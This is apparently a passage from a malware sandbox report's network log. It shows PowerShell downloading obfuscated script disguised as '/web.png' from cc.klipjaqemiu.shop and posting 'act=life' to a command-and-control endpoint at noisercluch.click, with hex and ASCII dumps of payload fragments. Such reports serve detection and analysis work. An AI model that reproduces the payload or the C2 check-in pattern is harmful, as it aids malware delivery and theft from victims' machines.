                                                          Jan 1, 2025 17:11:18.658471107 CET49871443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:18.658483982 CET44349871188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:18.738953114 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:18.738971949 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:18.739036083 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:18.739331961 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:18.739343882 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.224694967 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.224757910 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.226162910 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.226175070 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.226548910 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.229068995 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.229198933 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.229237080 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.229294062 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.229305029 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.852219105 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.852313042 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:19.852371931 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.853379011 CET49881443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:19.853395939 CET44349881188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.019084930 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.019126892 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.019201040 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.019421101 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.019432068 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.475455046 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.475519896 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.476479053 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.476485968 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.476682901 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.477720022 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.477794886 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.477798939 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.893285036 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.893400908 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:20.893502951 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.893609047 CET49888443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:20.893629074 CET44349888188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.324610949 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.324642897 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.324733973 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.325232983 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.325248957 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.780821085 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.780893087 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.782526016 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.782536983 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.782774925 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.784156084 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.786689043 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.786736965 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.786829948 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.786869049 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.786977053 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787024975 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.787163019 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787195921 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.787349939 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787383080 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.787528992 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787554979 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.787580013 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787585974 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.787707090 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787734032 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.787756920 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787889004 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.787923098 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.796673059 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.796874046 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.796905041 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:21.796928883 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.796982050 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:21.799158096 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.336900949 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.336973906 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.337059021 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.337225914 CET49899443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.337241888 CET44349899188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.342329979 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.342349052 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.342432022 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.342658043 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.342668056 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.796685934 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.796765089 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.798500061 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.798506021 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.798701048 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:24.799812078 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.799904108 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:24.799925089 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.246870041 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.246908903 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.246937037 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.246977091 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.246978045 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.246987104 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.247016907 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.247705936 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.247734070 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.247761965 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.247762918 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.247770071 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.247818947 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.248315096 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.248374939 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.251595974 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.251682997 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.251739979 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.251795053 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.251795053 CET49918443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:11:25.251806974 CET44349918188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:11:25.251813889 CET44349918188.114.96.3192.168.2.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 1, 2025 17:10:03.090797901 CET5123653192.168.2.41.1.1.1
                                                          Jan 1, 2025 17:10:03.101011992 CET53512361.1.1.1192.168.2.4
                                                          Jan 1, 2025 17:11:14.464052916 CET5655553192.168.2.41.1.1.1
                                                          Jan 1, 2025 17:11:14.477303982 CET53565551.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 1, 2025 17:10:03.090797901 CET192.168.2.41.1.1.10xf80eStandard query (0)cc.klipjaqemiu.shopA (IP address)IN (0x0001)false
                                                          Jan 1, 2025 17:11:14.464052916 CET192.168.2.41.1.1.10xda9bStandard query (0)noisercluch.clickA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 1, 2025 17:10:03.101011992 CET1.1.1.1192.168.2.40xf80eNo error (0)cc.klipjaqemiu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 1, 2025 17:10:03.101011992 CET1.1.1.1192.168.2.40xf80eNo error (0)cc.klipjaqemiu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                          Jan 1, 2025 17:11:14.477303982 CET1.1.1.1192.168.2.40xda9bNo error (0)noisercluch.click188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 1, 2025 17:11:14.477303982 CET1.1.1.1192.168.2.40xda9bNo error (0)noisercluch.click188.114.97.3A (IP address)IN (0x0001)false
                                                          • cc.klipjaqemiu.shop
                                                          • noisercluch.click
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449733188.114.96.34432108C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:10:03 UTC76OUTGET /web.png HTTP/1.1
                                                          Host: cc.klipjaqemiu.shop
                                                          Connection: Keep-Alive
                                                          2025-01-01 16:10:03 UTC982INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:10:03 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 8475282
                                                          Connection: close
                                                          X-Powered-By: Express
                                                          ETag: W/"815292-ZLO5PXEPNkzfvJsLmcITlIQ+ErY"
                                                          Set-Cookie: connect.sid=s%3ARbuu9gVQArSmXEI1yx15vaOlyMXfUVPB.GCCoIluFg6CH%2Fc7VB5iwi2gpuoGp2NY7abuMeDihUlQ; Path=/; HttpOnly
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIjVkQ4jALTfYhl4yPWyoT07vMO7%2BCBwzuaWlGO833ZXU0ufWGasB45CFtBruKse4Bm8mEy%2BMymmCv1ySNAwR8enMtw3sKbH0wRPya%2FcYzvqjXnfOBdNzgCxcJ8EbkAx4Z8qql9x"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c6fd2e984379-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1607&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=690&delivery_rate=1699650&cwnd=200&unsent_bytes=0&cid=e7c9fd1183da1686&ts=389&x=0"
                                                          2025-01-01 16:10:03 UTC387INData Raw: 0d 0a 24 79 64 4f 74 77 6b 46 68 20 3d 20 28 28 28 28 28 39 32 38 39 34 31 20 2a 20 2d 31 31 29 20 2b 20 28 28 28 28 31 31 32 38 35 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2b 20 37 31 36 33 36 36 29 20 2b 20 34 35 34 29 29 29 20 2a 20 2d 34 38 37 29 20 2d 20 32 37 33 31 29 20 2b 20 2d 38 38 29 0d 0a 24 52 72 48 56 77 4e 57 46 6b 70 52 20 3d 20 28 28 28 28 28 28 36 38 39 39 38 20 2a 20 28 28 28 28 28 28 34 31 30 37 30 39 20 2a 20 33 36 37 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 35 39 29 29 29 20 2a 20 28 28 28 28 2d 39 20 2a 20 2d 31 29 20 2d 20 32 36 34 34 35 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2d 20 24 52 72 48 56 77 4e 57 46 6b 70
                                                          Data Ascii: $ydOtwkFh = (((((928941 * -11) + ((((11285 * $ydOtwkFh) + 716366) + 454))) * -487) - 2731) + -88)$RrHVwNWFkpR = ((((((68998 * ((((((410709 * 367) + $RrHVwNWFkpR) * $ydOtwkFh) - $ydOtwkFh) - 59))) * ((((-9 * -1) - 26445) + $RrHVwNWFkpR))) - $RrHVwNWFkp
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 79 70 20 2d 20 2d 31 32 33 31 39 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 29 29 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 4b 76 48 6f 6a 56 52 4b 6f 20 3d 20 28 28 28 28 24 79 64 4f 74 77 6b 46 68 20 2b 20 39 38 30 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2d 20 2d 35 31 35 33 31 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 0d 0a 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 31 38 33 29 20 2d 20 35 34 32 35 29 20 2b 20 2d 37 38 30 29 20 2a 20 24 79 51 55 49 4d 48 68 57 29 0d 0a 24 6c 4b 76 48 73 76 53 46 4b 68 20 3d 20 28 28 24 79 64 4f 74 77 6b 46 68 20 2d 20 28 28 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 24 4d 6c 6a 77 4a 72 79 70 29
                                                          Data Ascii: yp - -12319) - $ydOtwkFh))) + $ydOtwkFh)$KvHojVRKo = (((($ydOtwkFh + 980) + $RrHVwNWFkpR) - -51531) * $RrHVwNWFkpR)$yQUIMHhW = ((((($MljwJryp + $ydOtwkFh) * -183) - 5425) + -780) * $yQUIMHhW)$lKvHsvSFKh = (($ydOtwkFh - (((((($lKvHsvSFKh - $MljwJryp)
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 51 4f 45 29 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 5a 6f 4d 77 7a 6f 20 3d 20 28 28 28 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2a 20 28 28 28 36 37 35 31 36 38 20 2a 20 2d 39 32 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2a 20 28 28 28 28 2d 31 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 2d 38 30 30 34 35 29 20 2b 20 24 79 51 55 49 4d 48 68 57 29 29 29 20 2a 20 35 32 36 34 34 34 29 20 2d 20 24 6a 5a 79 4a 78 78 41 6c 59 29 20 2d 20 35 38 32 37 32 29 0d 0a 24 7a 66 71 72 71 73 48 73 49 66 6d 20 3d 20 28 28 24 73 6f 65 4b 69 59 44 6b 71 65 59 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 4b 76 48 6f 6a 56 52 4b 6f 29 0d 0a 24 71 6f 46 70 4c 68 6e 66 20 3d 20 28 28
                                                          Data Ascii: QOE) - $fkuVbXZoeVZ) * $ydOtwkFh)$ZoMwzo = ((((($AuQDBhGZK * (((675168 * -92) * $RrHVwNWFkpR))) * ((((-1 + $lKvHsvSFKh) * -80045) + $yQUIMHhW))) * 526444) - $jZyJxxAlY) - 58272)$zfqrqsHsIfm = (($soeKiYDkqeY + $lKvHsvSFKh) * $KvHojVRKo)$qoFpLhnf = ((
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 6a 75 55 62 59 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 20 2a 20 2d 37 39 34 30 37 29 20 2a 20 36 29 0d 0a 20 20 20 20 69 66 20 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2d 6c 74 20 24 71 6f 46 70 4c 68 6e 66 29 20 2d 6f 72 20 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 65 71 20 2d 33 32 35 32 29 20 2d 6f 72 20 28 38 20 2d 67 65 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 20 2d 6f 72 20 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 67 74 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 6e 4e 73 4c 73 4c 62 53 47 20 3d 20 28 28 28 24 7a 66 71 72 71 73 48 73 49 66 6d 20 2b 20 2d 33 35 39 38 29 20 2b 20 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2d 20 2d 34 34 29 29 29 20 2d
                                                          Data Ascii: juUbY) + $ggJdTVtnpC))) * -79407) * 6) if (($AuQDBhGZK -lt $qoFpLhnf) -or ($RrHVwNWFkpR -eq -3252) -or (8 -ge $zfqrqsHsIfm) -or ($ZciUjuUbY -gt $lKvHsvSFKh)) { $nNsLsLbSG = ((($zfqrqsHsIfm + -3598) + ((($lKvHsvSFKh - $soeKiYDkqeY) - -44))) -
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 0a 20 20 20 20 69 66 20 28 28 34 36 20 2d 6c 65 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2d 61 6e 64 20 28 32 20 2d 6e 65 20 2d 32 29 20 2d 61 6e 64 20 28 24 67 67 4a 64 54 56 74 6e 70 43 20 2d 6c 65 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 67 48 66 64 72 4f 46 20 3d 20 28 28 28 28 28 28 28 2d 31 36 35 33 33 30 20 2d 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2a 20 28 28 28 28 2d 39 38 35 39 37 20 2d 20 24 71 6f 46 70 4c 68 6e 66 29 20 2a 20 33 38 37 39 30 29 20 2a 20 37 32 33 35 38 37 29 29 29 20 2b 20 2d 38 35 36 35 29 20 2b 20 28 28 28 28 24 56 41 58 70 51 68 20 2d 20 2d 37 34 34 32 35 29 20 2b 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2a 20 24 41 75 51 44 42 68 47 5a 4b 29 29 29 20 2b 20 2d 35 39 36 31
                                                          Data Ascii: if ((46 -le $soeKiYDkqeY) -and (2 -ne -2) -and ($ggJdTVtnpC -le $AnPtnCJVAPJ)) { $gHfdrOF = (((((((-165330 - $zdtmPCIdje) * ((((-98597 - $qoFpLhnf) * 38790) * 723587))) + -8565) + (((($VAXpQh - -74425) + $soeKiYDkqeY) * $AuQDBhGZK))) + -5961
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 29 20 2b 20 31 38 29 20 2a 20 28 28 28 28 28 24 66 6b 75 56 62 58 5a 6f 65 56 5a 20 2d 20 2d 35 35 31 32 37 29 20 2d 20 28 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2b 20 2d 32 29 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2b 20 24 4a 4f 44 52 52 75 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 29 20 2a 20 28 28 28 28 2d 38 32 30 20 2d 20 33 38 34 39 29 20 2d 20 36 37 30 29 20 2b 20 2d 33 32 33 34 30 34 29 20 2b 20 31 30 29 29 29 29 29 29 20 2a 20 2d 37 32 33 33 29 20 2a 20 35 37 33 37 34 29 29 20 2b 20 28 28 36 30 20 2a 20 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 24 4a 4f 44 52 52 75 29 20 2a 20 24 5a 6f 4d 77 7a 6f 29 20 2d 20 37 29 29 29 20 2d 20 34 33 38 35 29 29 0d 0a 24 74 78 64 7a
                                                          Data Ascii: ) + 18) * ((((($fkuVbXZoeVZ - -55127) - (((((($zdtmPCIdje + -2) + $lKvHsvSFKh) - $lKvHsvSFKh) + $JODRRu) - $ggJdTVtnpC)))) * ((((-820 - 3849) - 670) + -323404) + 10)))))) * -7233) * 57374)) + ((60 * (((($XrvKlj - $JODRRu) * $ZoMwzo) - 7))) - 4385))$txdz
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2b 20 2d 35 35 33 31 34 29 29 29 20 2a 20 32 37 30 29 0d 0a 20 20 20 20 24 67 59 65 52 44 68 62 52 4f 2d 2d 0d 0a 7d 0d 0a 69 66 20 28 28 36 34 36 39 20 2d 6c 74 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2d 6f 72 20 28 24 56 41 58 70 51 68 20 2d 6c 74 20 2d 31 32 39 29 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2a 20 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2b 20 28 28 28 2d 31 32 36 34 33 32 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 2d 35 31 35 39 30 33 29 29 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 71 6f 46 70
                                                          Data Ascii: + $ggJdTVtnpC) - $ggJdTVtnpC) + -55314))) * 270) $gYeRDhbRO--}if ((6469 -lt $zdtmPCIdje) -or ($VAXpQh -lt -129)) { $yQUIMHhW = ((((((($qoFpLhnf * ((((($qoFpLhnf + (((-126432 + $RrHVwNWFkpR) * -515903))) + $ggJdTVtnpC) - $lKvHsvSFKh) * $qoFp
                                                          2025-01-01 16:10:03 UTC1369INData Raw: 2b 20 24 76 76 6b 45 44 50 61 62 29 20 2d 20 24 56 41 58 70 51 68 29 20 2b 20 28 28 28 28 28 28 35 37 34 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2a 20 24 4c 46 7a 68 4e 6f 62 6a 5a 29 20 2d 20 33 38 31 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 32 34 39 36 37 38 29 29 29 20 2d 20 2d 36 29 29 0d 0a 7d 0d 0a 24 51 4e 54 5a 43 42 20 3d 20 36 0d 0a 77 68 69 6c 65 20 28 24 51 4e 54 5a 43 42 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 6c 74 20 31 30 33 29 20 2d 61 6e 64 20 28 24 77 74 79 63 4a 42 51 4f 45 20 2d 6c 65 20 2d 35 31 37 35 37 38 29 20 2d 61 6e 64 20 28 24 62 48 43 78 7a 43 5a 20 2d 6c 74 20 30 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 50 4c 73 6e 47 7a 6e 52 5a 20 3d 20
                                                          Data Ascii: + $vvkEDPab) - $VAXpQh) + ((((((574 + $ggJdTVtnpC) * $LFzhNobjZ) - 381) - $ydOtwkFh) * -249678))) - -6))}$QNTZCB = 6while ($QNTZCB -gt 0) { if (($RrHVwNWFkpR -lt 103) -and ($wtycJBQOE -le -517578) -and ($bHCxzCZ -lt 0)) { $PLsnGznRZ =
                                                          2025-01-01 16:10:04 UTC1369INData Raw: 28 28 2d 35 37 39 20 2a 20 31 34 39 30 29 20 2b 20 2d 39 39 38 32 29 20 2b 20 2d 39 39 29 0d 0a 69 66 20 28 28 2d 37 39 30 20 2d 6c 74 20 24 77 74 79 63 4a 42 51 4f 45 29 20 2d 61 6e 64 20 28 24 56 41 58 70 51 68 20 2d 6e 65 20 24 4a 4f 44 52 52 75 29 20 2d 61 6e 64 20 28 24 5a 6f 4d 77 7a 6f 20 2d 65 71 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 29 20 7b 0d 0a 20 20 20 20 24 4a 4f 44 52 52 75 20 3d 20 28 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 28 28 28 28 28 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 20 2d 36 39 34 36 29 20 2b 20 24 58 72 76 4b 6c 6a 29 20 2a 20 28 28 28 28 28 28 2d 33 38 32 20 2b 20 36 30 31 30 29 20 2a 20 2d 34 29 20 2d 20 33 37 29 20 2a 20 39 39 37 31 29 20 2d 20 24 56 41 58 70 51 68 29 29 29 29 20 2d 20 28 28 28 28 28 24 6e 4e 73 4c 73
                                                          Data Ascii: ((-579 * 1490) + -9982) + -99)if ((-790 -lt $wtycJBQOE) -and ($VAXpQh -ne $JODRRu) -and ($ZoMwzo -eq $zfqrqsHsIfm)) { $JODRRu = ((((($XrvKlj - (((((($ZciUjuUbY - -6946) + $XrvKlj) * ((((((-382 + 6010) * -4) - 37) * 9971) - $VAXpQh)))) - ((((($nNsLs
                                                          2025-01-01 16:10:04 UTC177INData Raw: 20 30 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 28 28 28 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2a 20 2d 38 29 20 2d 20 38 31 35 33 29 20 2a 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2a 20 24 79 49 70 65 6d 75 4f 63 66 29 29 29 20 2a 20 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2a 20 2d 38 35 38 29 20 2a 20 2d 34 35 29 20 2a 20 24 76 76 6b 45 44 50 61 62 29 29 29 29 20 2b 20 28 28 28 24 76 76 6b
                                                          Data Ascii: 0) { $yQUIMHhW = ((((($zdtmPCIdje - $fkuVbXZoeVZ) * ((((($RrHVwNWFkpR * -8) - 8153) * $MljwJryp) * $yIpemuOcf))) * (((($lKvHsvSFKh * -858) * -45) * $vvkEDPab)))) + ((($vvk


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449849188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:14 UTC264OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2025-01-01 16:11:15 UTC1131INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
